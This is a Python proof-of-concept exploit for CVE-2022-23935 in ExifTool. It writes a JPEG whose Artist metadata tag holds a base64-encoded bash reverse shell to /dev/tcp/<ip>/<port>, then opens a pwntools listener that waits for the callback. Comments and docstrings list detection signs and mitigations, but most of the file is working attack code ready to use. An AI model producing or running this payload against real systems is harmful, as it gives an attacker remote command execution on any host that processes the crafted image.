CVE-2022-23935.py
#!/usr/bin/env python3
import sys
import os
import base64
from pwn import log, listen
class ExploitExiftools:
    """Proof-of-concept driver published under the file name CVE-2022-23935.py.

    The class does two things: it writes a small JPEG whose ``Artist``
    metadata tag holds a shell pipeline, and it then opens a local listener
    and waits for an inbound connection.

    Observable artefacts for detection and triage, all taken from the code
    below:

    * a file named ``<path of this script>.jpg`` with an ``Artist`` tag of
      the form ``echo <base64> | base64 -d | bash |`` (note the trailing
      pipe character);
    * the decoded base64 is an interactive bash redirected to
      ``/dev/tcp/<ip>/<port>``, so a host that evaluates it would show a
      bash process with an outbound TCP connection;
    * a process tree in which the metadata tool spawns ``sh``/``bash`` and
      ``base64 -d`` is a strong signal on systems that parse uploaded images.

    Mitigation is outside this file: apply the vendor's fixed ExifTool
    release for this CVE and run metadata extraction on untrusted files in
    a sandbox without outbound network access.
    """

    def __init__(self, ip, port):
        """Store the callback address and create the pwntools progress logger.

        Args:
            ip: address embedded in the generated payload; used verbatim.
            port: port embedded in the payload and also used for the local
                listener in ``start_listener``.
        """
        self.ip = ip
        self.port = port
        # Progress logger with an empty title; status/success messages
        # below are written through it.
        self.p = log.progress("")

    def generate_payload(self):
        """Create the JPEG on disk and write the command string into its Artist tag.

        Side effects: writes ``<this script's absolute path>.jpg`` and invokes
        the locally installed ``exiftool`` binary through ``os.system``.
        """
        self.p.status("Generating payload...")
        # Bash one-liner that connects back to self.ip:self.port. ip and port
        # are interpolated without any validation.
        payload = bytes(f'/bin/bash -i >& /dev/tcp/{self.ip}/{self.port} 0>&1', 'utf-8')
        # Base64 keeps the redirection characters out of the outer command.
        encoded_payload = base64.b64encode(payload)
        # Embedded base64 of a minimal JPEG (the data starts with a JFIF
        # header); it only serves as a carrier for the metadata tag.
        img_data = b"/9j/4AAQSkZJRgABAQEASABIAAD/2wBDAAMCAgICAgMCAgIDAwMDBAYEBAQEBAgGBgUGCQgKCgkICQkKDA8MCgsOCwkJDRENDg8QEBEQCgwSExIQEw8QEBD/yQALCAABAAEBAREA/8wABgAQEAX/2gAIAQEAAD8A0s8g/9k="
        # Output path is derived from this script's own location, so the
        # image lands next to the script rather than in the working directory.
        img_file = f"{os.path.abspath(__file__)}.jpg"
        with open(img_file, "wb") as f:
            f.write(base64.b64decode(img_data))
        encoded_cmd = encoded_payload.decode()
        # Pipeline stored in the tag: decode the base64 and feed it to bash.
        # The trailing "|" is part of the stored value.
        cmd = f"echo {encoded_cmd} | base64 -d | bash |"
        # NOTE(review): the command line is built by string interpolation and
        # run through the shell. img_file is not quoted, so a script path with
        # spaces or shell metacharacters changes what the local shell executes;
        # the exit status of exiftool is ignored, so the success message below
        # is printed even if exiftool is missing or fails.
        os.system(f"exiftool -Artist='{cmd}' {img_file}")
        self.p.success(f"Payload generated and saved as {img_file}")

    def start_listener(self):
        """Listen on ``self.port`` and attach the terminal to the first connection.

        Blocks until a peer connects; there is no timeout in this code.
        """
        self.p.status("Waiting for connection...")
        # pwntools listener bound to the configured port.
        l = listen(self.port)
        conn = l.wait_for_connection()
        self.p.success("Connected!")
        # Hands stdin/stdout over to the connected peer until it closes.
        conn.interactive()

    def run(self):
        """Generate the image first, then block in the listener."""
        self.generate_payload()
        self.start_listener()
if __name__ == "__main__":
    # Entry point: exactly two positional arguments (<ip> <port>) are required.
    argv = sys.argv
    if len(argv) != 3:
        print(f"Usage: {argv[0]} <ip> <port>")
        sys.exit(1)
    # The port is converted with int(); a non-numeric value raises ValueError
    # before any file is written. The ip string is passed through unchecked.
    host, port_text = argv[1], argv[2]
    ExploitExiftools(host, int(port_text)).run()